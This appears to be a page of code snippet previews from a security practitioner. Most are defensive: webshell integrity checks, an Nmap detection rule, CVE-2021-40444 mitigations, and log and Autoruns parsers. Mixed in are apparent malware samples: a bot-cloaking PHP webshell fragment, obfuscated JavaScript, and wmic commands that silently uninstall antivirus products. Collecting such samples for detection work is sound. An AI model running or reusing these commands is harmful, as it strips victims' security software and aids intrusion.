technion

<#

  Exchange IIS Server Integrity Check
  Identify common webshells and backdoors associated with compromises


  Usage:
  Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates
  Write-IntegrityFile [ -hashfile "filename.json" ]

technion

<?php

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}

if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');

if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');

if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');

technion

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local string = require "string"
author = {"technion@lolware.net"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}

-- Detection rule based on: https://twitter.com/GossiTheDog/status/1424673929382268932

technion

Set-Strictmode -Version 2

# Applies reg keys from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section

for($i = 0; $i -le 3; $i++) {
    $RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i"
    if (-not (Test-Path $RegPath)) {
        New-Item $RegPath -Force
    }

technion

$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv


Foreach ($item in $autorunsArray) {
    $detection = $item.'VT detection'
    if ($detection -eq "" -or $detection -eq 'Unknown') {
        continue
    }
    Write-Output $detection

technion

$v='ipc';
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive

cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive

cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive

cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive

cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive

technion

Set-StrictMode -Version 2
# Connect first
# Connect-AzureAD

function Get-LicencesforUser
{
    param([object]$user)

    # $user should be populated with
    # $user = Get-AzureADUser -ObjectId username@domain.com

technion

!WA:2!1zvZUTTrq4YOwKc1IcB3a30FqbtBtacqRQLsIDQrqqfTLtuJSTcLSDcGrLwYDL42qUC7UlTLuVjKd5SEe0HCOON0JGFcim6tGrFc8lq7SKuYQUUxKwoC2DN5B(MVHgBTuWs4LWVX3jsseT6Bmjiet8Rk3JrvELqCQNO3UD6ijkJjyQK7J63K0tDnr)PwrmxVqr9qkt5SrLDAwXEItOateBe6hk(PC5Yvp3kfEWejkGO3AKG0UuKW)AN7GCFvxryedN6AIFx6NZFfHWll5exLnsrd9gNeGT4iLh)wGDFF53JeUigHhEmKcsfsrA56rKQcbLSWePl)PLzm4ACjsZgEiC4XorcMPGiPsL0KYmD9qktCKGY6AQ8iMnpgmwjGteHcPjH5c7wrefgkcv6OGzy1jKP4lSLGoW85riSaPqMnB64kc5T6x)DxPW9lEUknDpqG4BdrT9g1kVD9HsYVgbhjjhFXoHcskcKHm8vRQVOoixYHLX4qM8WdiOxvosGKhwxNGjl3MGPOdtTQ)9ENktYRxKwuYXxakNLX)sKurWe82uM3y4MGaVzFoXI6gYsl0aC1ks(8rAlvz66j)gUHH(WzX0H0MujYXNG9gj9rmLolCQUtJQBwzmSdmvJfY8ISen(ZMekOewkgnC)k2nRUr5ANKYhsJTpWcfPGYOk09iIqc(9(F7DNsTQch6nV2h)3wdcddmUief9(RfkfrXtw5(LTxBn7JSDWdDdd4qnu6LX3sI)pX(ykw5vK)5ZXwBb4Cas1INTWwrdiqjZnj8x1g4mc1(Ia4WqDj87E7Ifsyw7auwZh)y7eIcb)Ohz(DMLFYtS31SAdZgpTAtUz2EMEdflaeoLEFzwSyHmYjt9sbOFPgLFj)w)N9n7cZmfV(yCyRm3ABrH(X8oDG)KE5h3H2JGpqNOV(dVaLudm4lCrtvkE)EWALpLb4)EnRvDNk8BaHickxqFI1mN9olfe1wWahMVGLpDWaKaB2e4dkkFKK43jTn3A3Mn3DBB3Pn4gos

technion

# More information: https://support.microsoft.com/en-au/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
Set-StrictMode -Version 2

# Fetch all Domain Controllers. Use this pattern to fetch from all sites.
$addomain = Get-ADDomain
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)"

foreach ($dc in $controllers) {
    # Errors are ignored so as not to throw an exception if there are no such logs found
    Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore 

technion

'use strict';
/** @type {!Array} */
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string", 
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write"